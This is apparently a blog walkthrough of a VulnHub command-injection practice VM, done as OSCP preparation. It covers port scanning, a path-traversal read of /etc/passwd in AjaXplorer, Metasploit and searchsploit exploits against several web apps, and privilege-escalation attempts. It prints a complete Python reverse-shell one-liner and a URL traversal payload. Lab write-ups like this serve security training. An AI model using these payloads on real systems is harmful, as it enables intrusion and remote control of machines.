The machine

This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. This machine is the next on list and it can be downloaded on: vulnhub

The challenge

The challenge or goal of the machine lists the following:

We’ve packaged 10 real world applications into an Ubuntu Desktop based ISO. These applications are vulnerable to command injection attacks which you will need to find and exploit. Please note that not all applications are on port 80 🙂

https://www.vulnhub.com/entry/command-injection-iso-1,81/

Walk-through

The walk-through will be divided in a couple sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for complicity we do these three.

Information gathering

To start of we will find the IP address of the machine with nmap since netdiscover takes a while on my VMware. We will use the command sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP 192.168.0.139.

So to start of the machine we scan the machine for open ports with nmap. We will do two scans; sudo nmap -sV -sC 192.168.0.139 -oA nmap and sudo nmap -sV -sC -p- 192.168.0.139 -oA fullnmap. We use these parameters for;
-sV service and version enumeration,
-sC is for basic script usage.
-p- to do a full port scan.
-oA to save all output to a couple different files.

The nmap results are;

# Nmap 7.80 scan initiated Fri Feb 21 13:35:59 2020 as: nmap -sV -sC -oA commandos-nmap 192.168.0.139
Nmap scan report for 192.168.0.139
Host is up (0.000093s latency).
Not shown: 993 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 6a:48:f8:6f:9e:af:db:2a:57:73:c1:88:52:76:d1:ed (DSA)
|   2048 5a:53:1e:2f:77:c4:33:77:c5:ab:ee:22:6e:0c:97:da (RSA)
|_  256 05:af:e5:de:52:5f:81:74:dc:fb:a6:c0:09:46:c5:ed (ECDSA)
80/tcp    open  http        Apache httpd 2.2.22
| http-ls: Volume /
|   maxfiles limit reached (10)
| SIZE  TIME               FILENAME
| -     28-Jan-2010 10:51  AjaXplorer-2.5.5/
| -     02-May-2007 13:49  basilic-1.5.14/
| 411   17-Dec-2011 01:32  install.sql
| -     15-Jun-2010 01:55  lcms/
| -     09-May-2010 17:26  log1cms2.0/
| 1.4K  17-Dec-2011 01:32  manifest.xml
| 8.5K  17-Dec-2011 01:32  parameters.xml
| -     15-Mar-2011 14:13  php-charts_v1.0/
| -     26-Jun-2003 21:28  phptax/
| 1.7K  17-Dec-2011 01:32  sample.config_si.php
|_
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Index of /
8000/tcp  open  http        CherryPy httpd 3.1.2
| http-cookie-flags: 
|   /: 
|     session_id_8000: 
|_      httponly flag not set
|_http-server-header: CherryPy/3.1.2
| http-title:         Login -     Splunk 4.2.4 (110225)
|_Requested resource was http://192.168.0.139:8000/en-US/account/login?return_to=%2Fen-US%2F
8080/tcp  open  http        Zope httpd 2.12.1 (python 2.6.2, linux2; ZServer/1.1)
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Zope/(2.12.1, python 2.6.2, linux2) ZServer/1.1
| http-title: Login
|_Requested resource was http://192.168.0.139:8080/zport/acl_users/cookieAuthHelper/login_form?came_from=http%3A//192.168.0.139%3A8080/zport/dmd/
| http-webdav-scan: 
|   Allowed Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
|   Server Date: Fri, 21 Feb 2020 19:36:26 GMT, Fri, 21 Feb 2020 19:36:26 GMT
|   WebDAV type: Unknown
|_  Server Type: Zope/(2.12.1, python 2.6.2, linux2) ZServer/1.1
8081/tcp  open  http        TwistedWeb httpd 8.1.0
|_http-server-header: TwistedWeb/8.1.0
|_http-title: Site doesn't have a title (text/html).
| vmware-version: 
|   Server version: faultCode nil
|_  Locale version: nil nil
|_xmlrpc-methods: XMLRPC instance doesn't support introspection.
8089/tcp  open  ssl/unknown
|_ssl-date: 2020-02-21T19:36:55+00:00; +59m58s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
10000/tcp open  http        MiniServ 1.580 (Webmin httpd)
|_http-server-header: MiniServ/1.580
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 00:0C:29:82:06:80 (VMware)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:vmware:faultCode:nil

Host script results:
|_clock-skew: 59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 21 13:37:57 2020 -- 1 IP address (1 host up) scanned in 117.85 seconds

So we got A LOT OF http services running. We should start with the normal port 80. Lets run our web vulnerability and web directory bruteforcer: nikto -host http://192.168.0.139 -output commando80-nikto.txt and dirb http://192.168.0.139:80 /usr/share/wordlists/dirb/big.txt -o commando-dirb80.txt.

The nikto scan is done lets have a look:

Nikto is basicly saying that the directory is browsable. If we go to the website we can see that it is. Every folder in there is another application, a few that we have seen in previous vulnerable machines. Since I want to learn more and more about web applications (Going for my EWAPT exam soon) I might as well just do them all!

Exploitation

AjaxXplorer
When visiting AjaxXplorer we got greeted with a loginpage. Lucky for us the login credentials are admin:admin, a quick easy guess. Since the version number is in the directoryname, I googled for vulnerabilities and found the following CVE. Describing a Arbitrary file upload, get_content action or upload arbitrary files via ../%00 in the dir parameter in an upload action. So I started up burp to catch requests and we send a download request on a file. We got the following request:

As we can see we got an download action and the file parameters contains the path to the file, the %2f is a / but then url encoded. We can go to the decoder and encode this payload ../../../../../../../../../../../../../../../../../../etc/passwd to URL encoding so we can use it to change the value of the file parameter. Then we send it to repeater, this is easier incase we made a mistake and we can just edit and repeat the requests quickly and see the result on the right. Then we send it and check the response, we got the contents of /etc/passwd. We can use this on all files the web application has read access to. It has quite some users.

I tried a lot of things, but I could not get a file to upload to a listable directory or to the /tmp folder. That didn’t seem to work. On to the next application!

Basilic-1.5.14
I could not find much, or anything at all. Seems not to be installed. I see alot of basic documentation and files etc. But no library or search function. Searchsploit says it might be vulnerable for SQL, but i cant find the author search pages etc. I found the intranet folder and pages, but still no search function. Seems broken or not properly installed. However there is a metasploit module which we are able to use and exploit the machine:

LotusCMS
Could not really find anything either, tried SQL injecting multiple parameters but no luck. Then I tried the metasploit module which was available when I searched for lotuscms in searchsploit. We tried the module and it worked, we got a shell as www-data.

Log1cms2.0
I looked for an exploit for the log1cms and we instantly found one with searchsploit. It has multiple vulnerabilities. Lets not use metasploit this time. There is a exploit with a .php extension. We can copy this by doing searchsploit -m 18151.php.

So lets run this exploit and we got a shell as www-data aswell:

The .html link is a content validation error.

PHPchart
There are more applications to exploit. Lets have a look at the PHPchart application. There are multiple exploit available: So lets copy the .txt file to see how we can manually exploit this and check its contents:

So it seems like we can get command execution by using commands in the type parameter. Lets try this! and we got code execution! I could not get a shell back unfortunately, but this is possible with metasploit. We already got a shell, just trying to find more vulnerabilities in the webservices, otherwise we should just keep trying to spawn one. NC doesn’t work since its openbsd and you cant use -e.

PHPTAX
Is a web application we have done before, but we struggled a bit with it. No need to do it again tho.

SUGARCRM
There are multiple vulnerabilities for multiple versions available: But since i’m pretty tired, I wont be checking these and go on to the privilege escalation of the earlier metasploit shell we had. I’m not familair with metasploit and i’m wondering what it is capable off.

Privilege escalation

So lets see where metasploit is capable off. As I said, i”m a noob with the metasploit framework and I even had to lookup the getuid command.
I tried a couple things like the metasploit exploit suggester and the two exploits it suggested. May be usefull if it worked but it didn’t. The problem I had with the metasploit shell was that i could not backspace or anything. So I executed the following python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' and made another reverse shell to myself. I will use this shell since its way more practical and working then this metasploit shit (for me atleast)

So I wanted to upload this privesc checker a college of mine adviced me to use. But there is no git, no wget, cant use nc and no curl. So I was fucked getting this file on there, or ooh wait, there was this program where can upload files. I checked the machine quickly and found out that the files are in /var/www/AjaXplorer-2.5.5/files. So I started up my Chromium again (since firefox cant upload on this app -_-) and uploaded the priv checker.

And there it is!

To be honest, I have been trying hard to find an privilege escalation and then I went to the vulnhub page. It is not even intended to get root, its all about the applications and finding the command injection vulnerabilities. However, I still want to to get root, or at least try some kernel exploits, since I have been skipping them (They normally wont work on OSCP exam so trying to not rely on them) But in this case, lets have a look.

However, I could not find a working exploit.

Leave a Reply

Your email address will not be published. Required fields are marked *